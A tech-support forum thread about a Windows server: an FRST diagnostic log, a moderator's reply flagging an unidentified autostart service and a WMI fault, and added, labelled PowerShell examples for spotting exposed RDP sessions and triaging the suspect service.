Microsoft Antimalware (Version: 3.0.8107.0 - Microsoft Corporation) Hidden
Microsoft Forefront Endpoint Protection 2010 (HKLM\...\Microsoft Security Client) (Version: 2.0.657.0 - Microsoft Corporation)
Microsoft Forefront Endpoint Protection 2010 Server Management (Version: 2.0.0657.0 - Microsoft Corporation) Hidden
Microsoft Security Client (Version: 2.0.0657.0 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
PFA Server Registry Update (HKLM-x32\...\{173438F5-BD4D-47AE-9C8F-73E6BAA62624}) (Version: 1.0.0.0 - Hewlett-Packard Company)
System Center 2012 - Operations Manager Gateway (HKLM\...\{80C2A57A-4193-4800-AA27-CD79553FE9DF}) (Version: 7.0.9538.0 - Microsoft Corporation)
ThreatExpert Memory Scanner 1.0 (HKLM\...\ThreatExpert Memory Scanner_is1) (Version: 1.0.1.0 - Threat Expert Ltd.)

==================== Restore Points  =========================

Could not list Restore Points. Check "winmgmt" service or repair WMI.


==================== Hosts content: ==========================

2009-07-14 03:34 - 2013-12-03 19:46 - 00000862 ____A C:\Windows\system32\Drivers\etc\hosts
188.122.70.10         scom01.asapnet.local

==================== Scheduled Tasks (whitelisted) =============

Task: {63EE8552-A444-4BA2-8E1E-C8350D6D412A} - System32\Tasks\Microsoft\Windows\Server Manager\ServerManager => C:\Windows\system32\ServerManagerLauncher.exe [2009-07-14] (Microsoft Corporation)
Task: {69110D7B-41DC-4E9D-BDD3-C826C7DB613B} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleUsageCollector => C:\Windows\system32\ceipdata.exe [2010-11-21] (Microsoft Corporation)
Task: {815E046D-8DB5-440B-84D3-FDCA723411E6} - System32\Tasks\Microsoft\Windows\Backup\Microsoft-Windows-WindowsBackup => C:\Windows\System32\wbadmin.exe [2009-07-14] (Microsoft Corporation)
Task: {AFECE848-8DA2-461B-B5E6-CBEF57A4DF7D} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerRoleCollector => C:\Windows\system32\ceiprole.exe [2010-11-21] (Microsoft Corporation)
Task: {D49A10DA-0F70-4779-BD96-B2D976A4F2E3} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\Server\ServerCeipAssistant => C:\Windows\system32\ceipdata.exe [2010-11-21] (Microsoft Corporation)

==================== Loaded Modules (whitelisted) =============

2009-06-25 15:54 - 2009-06-25 15:54 - 00027136 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\XalanMessages_1_10.dll
2013-11-30 11:21 - 2009-05-13 15:34 - 00255488 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\SSLEAY32.dll
2013-11-30 11:21 - 2009-05-13 15:34 - 01362944 _____ () C:\hp\hpsmh\data\cgi-bin\vcagent\LIBEAY32.dll
2010-04-28 16:37 - 2010-04-28 16:37 - 00048128 _____ () C:\Windows\system32\CpqNiMgt\CPQNIMIB.DLL
2010-04-28 16:36 - 2010-04-28 16:36 - 00205824 _____ () C:\Windows\system32\cpqnimgt\w2kmgdll.dll
2010-04-28 16:33 - 2010-04-28 16:33 - 00018432 _____ () C:\Windows\system32\cpqnimgt\cqnisnmp.dll
2010-04-28 16:37 - 2010-04-28 16:37 - 00025088 _____ () C:\Windows\system32\CpqNiMgt\NICMIB.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00193024 _____ () C:\Windows\system32\CpqMgmt\Cqmgstor\stormib.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00030720 _____ () C:\Windows\system32\cqstrutl.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00007168 _____ () C:\Windows\system32\cpqmgmt\cqmgstor\storsnmp.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00027648 _____ () C:\Windows\system32\CpqMgmt\CqmgStor\iscsimib.dll
2013-11-30 11:20 - 2009-07-23 11:57 - 01531392 _____ () C:\hp\hpsmh\bin\libxml2.dll
2013-11-30 11:20 - 2009-03-09 18:08 - 00072704 _____ () C:\hp\hpsmh\bin\zlib1.dll
2010-04-28 16:36 - 2010-04-28 16:36 - 00205824 _____ () C:\Windows\system32\CPQNiMgt\w2kmgdll.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00032768 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CQMGSTOR.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00043008 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQIDE.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00041472 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMDISK.dll
2010-04-09 03:33 - 2010-04-09 03:33 - 00057856 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMSCSI.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00091136 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQMIDA.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00115200 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQFCA.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00050176 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQISCSI.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00030720 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\STORALRT.DLL
2010-04-09 03:33 - 2010-04-09 03:33 - 00050176 _____ () C:\Windows\system32\CpqMgmt\cqmgstor\CPQSAS.DLL
2013-11-30 11:20 - 2010-01-28 11:10 - 01411584 _____ () C:\hp\hpsmh\bin\LIBEAY32.dll
2013-11-30 11:20 - 2010-01-28 11:04 - 00266240 _____ () C:\hp\hpsmh\bin\SSLEAY32.dll
2013-11-30 11:20 - 2009-07-23 11:57 - 01531392 _____ () C:\hp\hpsmh\modules\libxml2.dll

==================== Alternate Data Streams (whitelisted) =========


==================== Safe Mode (whitelisted) ===================


==================== Disabled items from MSCONFIG ==============


==================== Faulty Device Manager Devices =============

Name: HP NC326i PCIe Dual Port Gigabit Server Adapter #2
Description: HP NC326i PCIe Dual Port Gigabit Server Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard Company
Service: q57nd60a
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.


==================== Event log errors: =========================

Application errors:
==================
Error: (02/24/2014 08:54:13 AM) (Source: Application Error) (User: )
Description: Faulting application name: sclient.exe, version: 0.0.0.0, time stamp: 0x519b9b1f
Faulting module name: sclient.exe, version: 0.0.0.0, time stamp: 0x519b9b1f
Exception code: 0x40000015
Fault offset: 0x00017a8d
Faulting process id: 0x654
Faulting application start time: 0xsclient.exe0
Faulting application path: sclient.exe1
Faulting module path: sclient.exe2
Report Id: sclient.exe3

Error: (02/24/2014 03:55:32 AM) (Source: Application Error) (User: )
Description: Faulting application name: rotatelogs.exe, version: 6.1.0.102, time stamp: 0x4b6122e1
Faulting module name: rotatelogs.exe, version: 6.1.0.102, time stamp: 0x4b6122e1
Exception code: 0xc00000fd
Fault offset: 0x00000000000092f7
Faulting process id: 0x1490
Faulting application start time: 0xrotatelogs.exe0
Faulting application path: rotatelogs.exe1
Faulting module path: rotatelogs.exe2
Report Id: rotatelogs.exe3

Error: (02/23/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation attempted at '2014-02-23T20:00:22.342310200Z' has failed to start, error code '2155348061' (%%2155348061). Please review the event details for a solution, and then rerun the backup operation once the issue is resolved.

Error: (02/23/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup) (User: NT AUTHORITY)
Description: The backup operation that started at '1601-01-01T00:00:00.000000000Z' has failed because no backup storage location could be found. Please confirm that the backup storage location is attached and online, and then rerun the backup operation.

Error: (02/23/2014 01:38:29 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/23/2014 01:24:05 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/23/2014 01:16:49 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/23/2014 01:16:07 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/23/2014 01:07:34 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.

Error: (02/23/2014 00:53:49 AM) (Source: Winlogon) (User: )
Description: The Windows logon process has unexpectedly terminated.


System errors:
=============
Error: (02/24/2014 09:42:11 AM) (Source: DCOM) (User: )
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}

Error: (02/24/2014 09:41:41 AM) (Source: Service Control Manager) (User: )
Description: The Windows Modules Installer service terminated with the following error:
%%1450

Error: (02/24/2014 09:41:35 AM) (Source: UmrdpService) (User: )
Description: Driver Send to Microsoft OneNote 15 Driver required for printer Send To OneNote 2013 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 09:41:34 AM) (Source: UmrdpService) (User: )
Description: Driver Microsoft XPS Document Writer v4 required for printer Microsoft XPS Document Writer is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 09:41:32 AM) (Source: UmrdpService) (User: )
Description: Driver Canon iR C2880/C3380 Class Driver required for printer iR C3380 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 09:41:31 AM) (Source: UmrdpService) (User: )
Description: Driver PDFCreator required for printer PDFCreator is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 09:41:29 AM) (Source: UmrdpService) (User: )
Description: Driver TOSHIBA Universal Printer 2 required for printer !!olamserver.olam.local!TOSHIBA eSTUDIO 2550 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 09:41:28 AM) (Source: UmrdpService) (User: )
Description: Driver Canon LBP6750/3560 Class Driver required for printer Canon-506 is unknown. Contact the administrator to install the driver before you log in again.

Error: (02/24/2014 08:54:26 AM) (Source: Service Control Manager) (User: )
Description: The Network.Tcp Port Sharing Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (02/24/2014 02:52:49 AM) (Source: Microsoft Antimalware) (User: )
Description: %NT AUTHORITY60 has encountered an error trying to update signatures.

    New Signature Version:

    Previous Signature Version: 1.167.464.0

    Update Source: %NT AUTHORITY49

    Update Stage: 3.0.8107.00

    Source Path: 3.0.8107.01

    Signature Type: %NT AUTHORITY602

    Update Type: %NT AUTHORITY604

    User: NT AUTHORITY\SYSTEM

    Current Engine Version: %NT AUTHORITY605

    Previous Engine Version: %NT AUTHORITY606

    Error code: %NT AUTHORITY607

    Error description: %NT AUTHORITY608


Microsoft Office Sessions:
=========================
Error: (02/24/2014 08:54:13 AM) (Source: Application Error)(User: )
Description: sclient.exe0.0.0.0519b9b1fsclient.exe0.0.0.0519b9b1f4000001500017a8d65401cf1cd71d17c19cC:\Windows\system32\sclient.exeC:\Windows\system32\sclient.exed9862dec-9d28-11e3-906f-18a9053c1a8a

Error: (02/24/2014 03:55:32 AM) (Source: Application Error)(User: )
Description: rotatelogs.exe6.1.0.1024b6122e1rotatelogs.exe6.1.0.1024b6122e1c00000fd00000000000092f7149001cf310be11aea06C:\hp\hpsmh\bin\rotatelogs.exeC:\hp\hpsmh\bin\rotatelogs.exe1fcaeba2-9cff-11e3-906f-18a9053c1a8a

Error: (02/23/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 2014-02-23T20:00:22.342310200Z2155348061%%2155348061

Error: (02/23/2014 09:00:22 PM) (Source: Microsoft-Windows-Backup)(User: NT AUTHORITY)
Description: 1601-01-01T00:00:00.000000000Z

Error: (02/23/2014 01:38:29 AM) (Source: Winlogon)(User: )
Description:

Error: (02/23/2014 01:24:05 AM) (Source: Winlogon)(User: )
Description:

Error: (02/23/2014 01:16:49 AM) (Source: Winlogon)(User: )
Description:

Error: (02/23/2014 01:16:07 AM) (Source: Winlogon)(User: )
Description:

Error: (02/23/2014 01:07:34 AM) (Source: Winlogon)(User: )
Description:

Error: (02/23/2014 00:53:49 AM) (Source: Winlogon)(User: )
Description:


==================== Memory info ===========================

Percentage of memory in use: 81%
Total physical RAM: 14325.74 MB
Available physical RAM: 2611.72 MB
Total Pagefile: 47055.14 MB
Available Pagefile: 34636.35 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:60 GB) (Free:13.93 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (Hyper-V) (Fixed) (Total:486.8 GB) (Free:145.4 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 547 GB) (Disk ID: 9C84BF43)
Partition 1: (Active) - (Size=60 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=487 GB) - (Type=07 NTFS)

==================== End Of Log ============================


Netstat:

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.10.2:3389      213.126.21.66:35578    ESTABLISHED     3636
  TermService
 [svchost.exe]
  TCP    192.168.10.2:5723      192.168.10.11:61761    ESTABLISHED     1404
 [HealthService.exe]
  TCP    192.168.10.2:5723      192.168.10.12:24429    TIME_WAIT       0
  TCP    192.168.10.2:5723      192.168.10.12:24431    TIME_WAIT       0
  TCP    192.168.10.2:5723      192.168.10.12:49005    ESTABLISHED     1404
 [HealthService.exe]
  TCP    192.168.10.2:57030     188.122.70.10:5723     ESTABLISHED     1404
 [HealthService.exe]
  TCP    192.168.10.2:57264     173.194.67.113:443     TIME_WAIT       0


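The table above shows one established RDP session (local port 3389) from 213.126.21.66, an address outside the 192.168.10.0/24 range every other peer sits in; the post does not say whether that is the poster's own remote session or someone else's, but it does show that RDP on this server is reachable from a public address. The PowerShell below is an added example, not part of the original post: it parses `netstat -ano` (or `-anob`, whose extra `[process.exe]` lines are simply skipped) and lists established connections to management ports whose peer is not in private address space. The port list and the private-range definition are assumptions chosen for this illustration; the sample lines in the usage section are copied from the post.

```powershell
# Added example (not from the forum post): flag established connections to
# remote-management ports whose peer is outside RFC 1918 / loopback space.
# On the server itself:  netstat -ano | Find-ExposedAdminSessions

function Test-PrivateIPv4 {
    param([Parameter(Mandatory=$true)][string]$Ip)
    $octets = $Ip.Split('.')
    # Anything that is not a plain IPv4 literal (e.g. an IPv6 peer in brackets)
    # is reported rather than silently trusted.
    if ($octets.Count -ne 4) { return $false }
    $a = [int]$octets[0]; $b = [int]$octets[1]
    return ($a -eq 10) -or
           ($a -eq 172 -and $b -ge 16 -and $b -le 31) -or
           ($a -eq 192 -and $b -eq 168) -or
           ($a -eq 127)
}

function Find-ExposedAdminSessions {
    param(
        [Parameter(ValueFromPipeline=$true)][string[]]$NetstatLines,
        # Assumption: ports an admin would want to see foreign sessions on
        # (RDP, WinRM http/https, SMB, RPC endpoint mapper).
        [int[]]$AdminPorts = @(3389, 5985, 5986, 445, 135)
    )
    begin {
        # Proto  Local Address  Foreign Address  State  PID
        $pattern = '^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$'
    }
    process {
        foreach ($line in $NetstatLines) {
            if ($line -notmatch $pattern) { continue }   # headers, "[svchost.exe]" lines, UDP
            $localPort = [int]$Matches[2]
            $remoteIp  = $Matches[3]
            $state     = $Matches[5]
            $procId    = [int]$Matches[6]
            if ($state -ne 'ESTABLISHED')          { continue }
            if ($AdminPorts -notcontains $localPort) { continue }
            if (Test-PrivateIPv4 -Ip $remoteIp)     { continue }
            New-Object PSObject -Property @{
                LocalPort = $localPort
                RemoteIp  = $remoteIp
                PID       = $procId
            }
        }
    }
}

# Usage on the lines posted in this thread (constructed from the post, not live output):
$sample = @'
  TCP    192.168.10.2:3389      213.126.21.66:35578    ESTABLISHED     3636
  TCP    192.168.10.2:5723      192.168.10.11:61761    ESTABLISHED     1404
  TCP    192.168.10.2:5723      192.168.10.12:24429    TIME_WAIT       0
  TCP    192.168.10.2:57264     173.194.67.113:443     TIME_WAIT       0
'@ -split "`r?`n"

$sample | Find-ExposedAdminSessions | Format-Table LocalPort, RemoteIp, PID -AutoSize
```

On the sample this reports only the 3389 session from 213.126.21.66 with PID 3636 (the TermService svchost in the post); the 5723 peers are private and the 443 entry is neither established nor on a watched port. The outbound HealthService connection to 188.122.70.10:5723 is not flagged because the function looks at local ports only; if that destination is not the expected management server it deserves the same scrutiny by hand.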
  • Root Admin

What is this software?  It has no company name and is loaded when the computer starts.
Unless you're certain of what it is, I would stop it from running.

S2 sclient; C:\Windows\system32\sclient.exe [192512 2013-12-07] ()


This could be due to something you've implemented to lock down the computer but could also be due to damage on the system.

Could not list Restore Points. Check "winmgmt" service or repair WMI.


Please review the following link and run the SFC utility on the system.
Using System File Checker (SFC) To Fix Issues
 


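As an added example (this is not the moderator's own code or instructions), the same three steps carried out from an elevated PowerShell prompt on the server: inspect the autostart service quoted above through WMI, reporting its binary's company name, Authenticode status, creation time and SHA-256 so the file can be compared against vendor or sandbox data; stop and disable it rather than delete it; then test the winmgmt service and a WMI query that FRST's "Could not list Restore Points" warning points at, before running SFC. The service name `sclient` is taken from the FRST line; the decision rule (no company name and nobody can vouch for it, so stop it) is the reply's; everything else is an assumption about what an administrator would want to see next.

```powershell
# Added example, not from the original reply: triage the autostart service
# "S2 sclient; C:\Windows\system32\sclient.exe ... ()" that FRST listed with
# no company name, stop and disable it, then check WMI and run SFC.

function Get-FileSha256 {
    param([Parameter(Mandatory=$true)][string]$Path)
    # Get-FileHash does not exist on older PowerShell; use the .NET hasher directly.
    $sha = [System.Security.Cryptography.SHA256]::Create()
    $fs  = [System.IO.File]::OpenRead($Path)
    try     { ([System.BitConverter]::ToString($sha.ComputeHash($fs))) -replace '-', '' }
    finally { $fs.Close() }
}

function Get-ServiceBinaryInfo {
    param([Parameter(Mandatory=$true)][string]$Name)
    $svc = Get-WmiObject -Class Win32_Service -Filter "Name='$Name'"
    if (-not $svc) { return $null }

    # PathName may be quoted and may carry arguments; keep the executable only.
    if     ($svc.PathName -match '^"([^"]+)"')  { $exe = $Matches[1] }
    elseif ($svc.PathName -match '^(.+?\.exe)') { $exe = $Matches[1] }
    else                                         { $exe = $svc.PathName }

    $file = Get-Item -LiteralPath $exe -ErrorAction SilentlyContinue
    $company = $null; $created = $null; $hash = $null; $sigStatus = 'FileNotFound'
    if ($file) {
        $company   = $file.VersionInfo.CompanyName          # empty for sclient per FRST
        $created   = $file.CreationTime
        $hash      = Get-FileSha256 -Path $file.FullName
        $sigStatus = (Get-AuthenticodeSignature -FilePath $file.FullName).Status
    }
    New-Object PSObject -Property @{
        Service   = $svc.Name
        StartMode = $svc.StartMode        # "Auto" is what FRST shows as S2
        State     = $svc.State
        RunsAs    = $svc.StartName
        Path      = $exe
        Company   = $company
        Signature = $sigStatus            # Valid / NotSigned / HashMismatch / FileNotFound
        Created   = $created
        SHA256    = $hash
    }
}

function Disable-UnknownService {
    param([Parameter(Mandatory=$true)][string]$Name)
    # Stop and disable rather than delete: the binary stays on disk for analysis
    # and the service definition remains as evidence of what re-created it.
    Stop-Service -Name $Name -Force -ErrorAction SilentlyContinue
    Set-Service  -Name $Name -StartupType Disabled
}

function Test-WmiHealth {
    # Service state comes from the Service Control Manager, so this works even
    # when the WMI repository itself is damaged; the query tests the repository.
    $status = (Get-Service -Name winmgmt).Status
    $os     = Get-WmiObject -Class Win32_OperatingSystem -ErrorAction SilentlyContinue
    New-Object PSObject -Property @{
        WinmgmtStatus = $status
        WmiQueryWorks = [bool]$os
    }
}

# --- usage ---
$info = Get-ServiceBinaryInfo -Name 'sclient'
$info | Format-List Service, StartMode, State, RunsAs, Path, Company, Signature, Created, SHA256

if ($info -and [string]::IsNullOrEmpty($info.Company)) {
    Disable-UnknownService -Name 'sclient'
}

Test-WmiHealth | Format-List
# If WinmgmtStatus is Running but WmiQueryWorks is False, repair the repository
# before trusting any WMI-based scanner:  winmgmt /verifyrepository  and, if it
# reports inconsistent,  winmgmt /salvagerepository
sfc /scannow
```

The SHA-256 and creation time are the two values worth keeping from this: the hash can be looked up against vendor and sandbox data without uploading the file, and the creation time places the service in the timeline next to the 2013-12-07 date FRST reports for the binary.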
This topic is now closed to further replies.